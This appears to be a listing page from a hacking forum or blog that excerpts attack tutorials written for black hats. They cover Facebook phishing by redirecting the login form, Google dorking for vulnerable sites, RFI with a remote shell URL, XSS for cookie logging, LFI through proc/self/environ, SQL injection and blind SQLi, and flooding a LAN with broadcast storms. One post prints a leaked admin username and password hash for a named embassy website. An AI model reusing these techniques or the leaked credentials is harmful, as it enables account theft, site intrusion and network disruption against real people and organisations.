What is a trojan/worm/virus/logic bomb?

Trojan: Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which performs an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, it's called a 'bug' or, in some cases, a feature. Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans.

Virus: A virus is an independent program which reproduces itself. It may attach to other programs, it may create...

How to Phish / Spoof FACEBOOK! (with pictures), Hack FB id

Now I'm gonna make a step by step tutorial for facebook accounts. WITH PICTURES!!! ONE!: go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". A LOT of text is gonna appear, copy it all to notepad. TWO!: Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes. You should find this. The big red ring that circles the "action=" you have to change. You have to change it to 'action="next.php" '. After you have done that, you should change the method (small red circle on...

How to search Vulnerable site

1-) First go to http://www.google.com 2-) Press on the right, next to the textfield, on "Advanced Search". 3-) Fill in your dork at "This exact wording or phrase". Results per page: 100 results (or less depending on your internet speed). Language: Could be all languages or one language. I choose Dutch because I'm Dutch myself and I got a Dutch ISP so those sites will load faster. Where your keywords show up: "in the URL of the page". 4-) Press search. 5-) Now we get this: 6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab. 7-) Open the tabs and add as example a single quote behind the link. 8-) If it's...

Apple Website Hacked by HodLuM

One of Apple's sub-domains is claimed to have been defaced by HodLuM, as shown above. The deface link is just an image uploaded to the Apple domain. The hacker uses the word "N00BZ" for all hackers, including Anonymous, Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. The AOL Postmaster website was also hacked by HODLUM some months befo...

RFI - Remote File Inclusion.

Today I will be teaching you guys RFI (Remote File Inclusion). What is RFI? RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites; many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion, is exactly what its name is. You include a file onto the website remotely. What makes a page vulnerable? A PHP include script looks like this. Code: <?php include($_GET['p']); ?> Since the code uses 'p' the syntax would be: Code: http://victimsite.com/index.php?p=URL_TO_SHELL.txt? If the script looks like this: Code: <?php include($_GET['lulz']); ?>...

XSS - Cross Site Scripting.

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it. What is XSS, what can I accomplish with it? XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later. Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website. What causes the vulnerability? Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the...

LFI (Local File Inclusion)

1 – Introduction In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code in proc/self/environ. It is a step by step tutorial. 2 – Finding LFI - Now we are going to find a Local File Inclusion vulnerable website. So we found our target, let's check it. Code: www.website.com/view.php?page=contact.php - Now let's replace contact.php with ../ so the URL will become Code: www.website.com/view.php?page=../ and we got an error Code: Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 Big chances to have a Local File Inclusion vulnerability. Let’s go to next step. - Now let's check for etc/passwd to see if it is Local File Inclusion...

Complete SQL Injection Tutorial

Introduction: Hello everyone. I am going to share with you one of the best of my tutorials here. Now let's begin!! SQL injection (aka SQLi or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is just basically injecting queries into a database or using queries to get authorization bypass as an admin. Things you should know: Data is in the columns and the columns are in tables and the tables are in the database. Just remember that so you understand the rest. PART 1: Bypassing admin login. Gaining auth bypass on an admin account. Most sites vulnerable...

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts (A Black Hat Team). They hacked into the database of the website and exposed sensitive information like admin details and many more. Website:- http://www.indianembassy.org.np/ user_name:- indianembassypassword:- 147f9d55b079a76d6ec6f36b61f4cf1a full_name:-  Administrator          Login Link:- http://www.indianembassy.org.np/admin/login.php  Ambassador Name:-   Jayant Prasad      Amb_id :- 21  Last Modification:- 2011-08-27    ...

Creating Broadcast storms to take down a switched Network?

I am willing to take down a LAN network with broadcast storms. Before that, here is the topology of our overall network. Please have a look at the following image which will represent the network set-up I am talking about. Code: http://i54.tinypic.com/a32fzn.png (As the image is large, I am placing this in code instead of [IMG] tags.) And here is the information about our LAN: Total sub-nets - 4. Clients - 90% of them running Windows XP SP2 and the rest running Windows 7 and Vista. Servers - each sub-net has a DC, i.e. server; they are running Windows 2003 OS. Main server - i.e. the one that is providing internet access to the rest of the clients and other servers in sub-nets 1, 2, 3, 4, running Red Hat Linux. And the switches used in our networks are un-managed ones and our network...

Scanning with Nessus

[-- Intro --] Welcome to the Nessus scanning quick guide. In this guide I'll show you blackhats how to use Tenable Nessus to scan websites // IPs for vulnerabilities. For this guide I'll be using http://sugarmegs.org/ [-- Installing Nessus --] For this tutorial I'll be using a Windows 7 machine, instead of my normal Linux, because the free version works a lot better on Windows. Now to the actual installing part. Step one, obtaining Nessus. To download Nessus, visit http://www.nessus.org/download/ and download it. Then install it like you'd install any other program. [-- Setting up --] Now to set up your Nessus server. Open the Nessus Server Manager that should be on your desktop (if it's not, look in C:\Program Files\Tenable\Nessus for it). Once you have that open,...

Mini Password Buffer Overflow Tut

Password Form Buffer Overflows. In this lesson we will be learning how to do a Login/Password Form Buffer Overflow. This is a very basic version of a Buffer Overflow but just as effective. Basically what is happening here is that Password Forms usually have a limit on the number of characters they are allowed to input, but we will bypass this limit, overloading the login and getting access to the Server! To do this we will need a tool called WebDeveloper for Firefox, which you can download here. This is a very simple hack so it only works on some Basic Authentication Logins, but it's good to know for the future if you find any! So on Firefox go Tools>Web Developer>Forms>Remove Maximum Lengths. Now type in a massively long code, e.g. "aaaaaaaaaaaaaaaaaaaaaaaaa" and so on, and it...

Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website: Code: site.com/index.php?id=1 To find out if it's vulnerable we will undergo a little test. For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2. Therefore we will compare these two websites: Code: site.com/index.php?id=1 and 1=1 and site.com/index.php?id=1 and 1=2 If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable. However, if they both load without missing content, it is not vulnerable. Step 2 Finding The Mysql Version This isn't very much of use in this kind of injection, but it might be useful. To find it out, you'll...

Hacking - Start to finish (quick list)

Hello, this little post will explain in rough detail how you start hacking a specific target. First: there are many different ways of going about this, but this is one way. Information gathering. The first thing you want to do when targeting a specific target is get as much information as possible before a front attack (if any, being quiet is much better). Now this step can take ages if you really want a detailed level of knowledge. And if you are serious about hacking your target, you should be detailed here. What sort of information do I look for, you might ask yourself? Well, anything really. Anything surrounding the target and even things that surround things that surround your target. Here is a short list of things...
